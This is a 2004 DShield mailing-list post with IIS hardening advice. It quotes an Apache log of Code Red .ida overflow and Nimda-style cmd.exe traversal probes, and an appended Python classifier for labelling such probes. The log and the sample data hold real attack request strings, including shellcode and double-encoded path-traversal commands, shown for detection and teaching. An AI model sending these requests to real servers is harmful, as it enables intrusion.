[Dshield] Look at this Nitwit

Al Reust areust at comcast.net
Thu Jan 29 05:17:59 GMT 2004


Hehehehe

This is very similar to quite a few logs that I have seen on a few web 
servers whose logs are private. It normally starts with the Code Red and 
then a list of "favorite" exploits. I hate to say it, but I started calling 
them "Script Kiddies in a Box." The similarities from various IPs that do 
not appear to be spoofed tend to tell me that there are a couple of "script 
kiddies" that are implying a "moderately" protected IIS box could be 
toppled by this sequence of exploits. So it appears that one individual 
that was "moderately" successful may have written a web page with "my 
10-20 top favorite exploits" and then provided access to the tool and a 
readily modifiable sequence of scripts.

What most "starting" IIS admins do not know is what various script mappings 
"do.." or what is removed by the IIS Lockdown tool and URLScan. The URL 
below is a good starting place for beginners, those inquiring minds..

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/columns/insider/iisi0603.asp

In most cases the experienced IIS admin removed the "unwanted/unnecessary" 
mappings and provided additional security through "rights" and 
"authorization" (as a NIX admin would say, fixed the 777; as an NT admin 
would say, turned off the "Everyone" access), turned off unwanted or 
undesired "services" to further enhance the security/stability of the 
box... and then took time to write custom ISAPI filters that perform some 
of the same functions as URLScan.

At times, looking at some of the questions, I see a lot of people that are 
only Nix side or NT side and few that have worked or have to work both 
sides. As the phrasing of the question "happens", and less so the statement 
about the OS/server, everyone presumes from their own point of view. So if 
you are new, please take a moment to identify the type of web server 
(Apache, IIS, etc.); most of the people that offer help will then decide 
whether to answer (or just chuckle and then answer). Someone will answer, 
but it may not have been the person you needed.

As Johannes stated:
If OS=Nix/Apache
         then  sit back and watch the fun.
Else, watch very closely.

Al

At 03:42 PM 1/28/2004 -0500, you wrote:
>Apache log:
>
>pcp03063113pcs.newlaf01.mi.comcast.net - - [28/Jan/2004:07:51:32 -0500]
>"GET
>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
>HTTP/1.0" 404 987 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:26 -0500]
>"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500]
>"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500]
>"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
>"GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
>"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
>906 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
>"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 906
>"-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500]
>"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
>973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500]
>"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
>"-" "-"
>
>                                ---------
>             Quality Management - A Commitment to Excellence
>
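The probe sequence quoted above (one Code Red ".ida" overflow attempt, then the Nimda-style root.exe / cmd.exe requests with double-encoded and overlong-UTF-8 traversal) is exactly the kind of pattern a log watcher wants to label automatically. The following is an added example, not code from the post or from DShield: it parses Apache common-log-format lines, normalises the encoding tricks so that `..%255c..`, `..%%35%63..` and `..%c0%af..` all collapse to `../..`, labels each request, and reports the per-host probe order. The hostnames and log lines in `SAMPLE_LOG` are constructed to mirror the posted log, and the label names are this example's own.

```python
"""Classify Code Red / Nimda style probes in Apache access-log lines.

Added example (not from the DShield post). Parses common-log-format lines,
normalises the URL-encoding tricks Nimda used to slip past IIS path checks,
and labels each request so the probe sequence per source host can be read off.
"""
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Common Log Format: host ident user [time] "method path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Overlong / malformed UTF-8 byte pairs that unpatched IIS decoded as a
# path separator (the %c0%af / %c1%9c family seen in the posted log).
OVERLONG = {
    b"\xc0\xaf": b"/", b"\xc0\x2f": b"/",
    b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\",
}

# Constructed sample log (hostnames are invented; requests mirror the post).
SAMPLE_LOG = """\
client-a.example.net - - [28/Jan/2004:07:51:32 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 987 "-" "-"
client-b.example.net - - [28/Jan/2004:10:49:26 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
client-b.example.net - - [28/Jan/2004:10:49:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
client-b.example.net - - [28/Jan/2004:10:49:28 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
client-b.example.net - - [28/Jan/2004:10:49:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
client-b.example.net - - [28/Jan/2004:10:49:30 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 906 "-" "-"
client-c.example.net - - [28/Jan/2004:11:02:11 -0500] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
"""


def _token(seq: bytes) -> str:
    """Render a byte pair as its percent-encoded form, e.g. b'\\xc0\\xaf' -> '%c0%af'."""
    return "".join(f"%{b:02x}" for b in seq)


def normalize_path(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (so %255c -> %5c -> backslash) and map the
    overlong sequences to real separators; returns a forward-slash path."""
    data = raw.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        for seq, sep in OVERLONG.items():
            decoded = decoded.replace(seq, sep)
        if decoded == data:
            break
        data = decoded
    return data.decode("latin-1", "replace").replace("\\", "/")


def evasions(raw: str) -> list[str]:
    """Name the encoding tricks present in the raw (undecoded) request path."""
    low = raw.lower()
    found = []
    if "%25" in low or "%%" in low:          # '%' encoded as %25, or the %%35c trick
        found.append("double-encoding")
    if any(_token(seq) in low for seq in OVERLONG):
        found.append("overlong-utf8")
    if "%u" in low:                           # Code Red's %uXXXX shellcode encoding
        found.append("%u-encoding")
    return found


def classify(raw: str) -> str:
    """Label one request path; 'benign' when nothing matches."""
    norm = normalize_path(raw).lower()
    if norm.startswith("/default.ida?"):
        return "code-red-overflow"       # .ida ISAPI buffer-overflow probe
    if "root.exe" in norm:
        return "root.exe-backdoor"       # cmd.exe copy left behind by an earlier worm
    if "cmd.exe" in norm:
        if "/../" in norm:
            return "cmd.exe-traversal"   # unicode / double-decode directory traversal
        return "cmd.exe-direct"          # drive-letter virtual roots (/c/, /d/)
    return "benign"


def scan(lines: list[str]) -> list[dict]:
    """Parse log lines and return one finding per parseable line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings.append({
            "host": m["host"], "ts": m["ts"], "status": int(m["status"]),
            "label": classify(m["path"]), "evasions": evasions(m["path"]),
            "normalized": normalize_path(m["path"]),
        })
    return findings


def sequences(findings: list[dict]) -> dict[str, list[str]]:
    """Group non-benign labels per source host, preserving log order."""
    per_host: dict[str, list[str]] = defaultdict(list)
    for f in findings:
        if f["label"] != "benign":
            per_host[f["host"]].append(f["label"])
    return dict(per_host)


if __name__ == "__main__":
    for host, labels in sequences(scan(SAMPLE_LOG.splitlines())).items():
        print(f"{host}: {' -> '.join(labels)}")
```

The decode loop is bounded on purpose: a request like `..%25%35%63..` needs two passes, and IIS's second-decode bug is the whole reason these strings exist, but decoding without a limit would let an attacker make the normaliser itself do unbounded work. Note too that the labels are taken from the normalised path while the evasion names are taken from the raw one, since the trick is only visible before decoding.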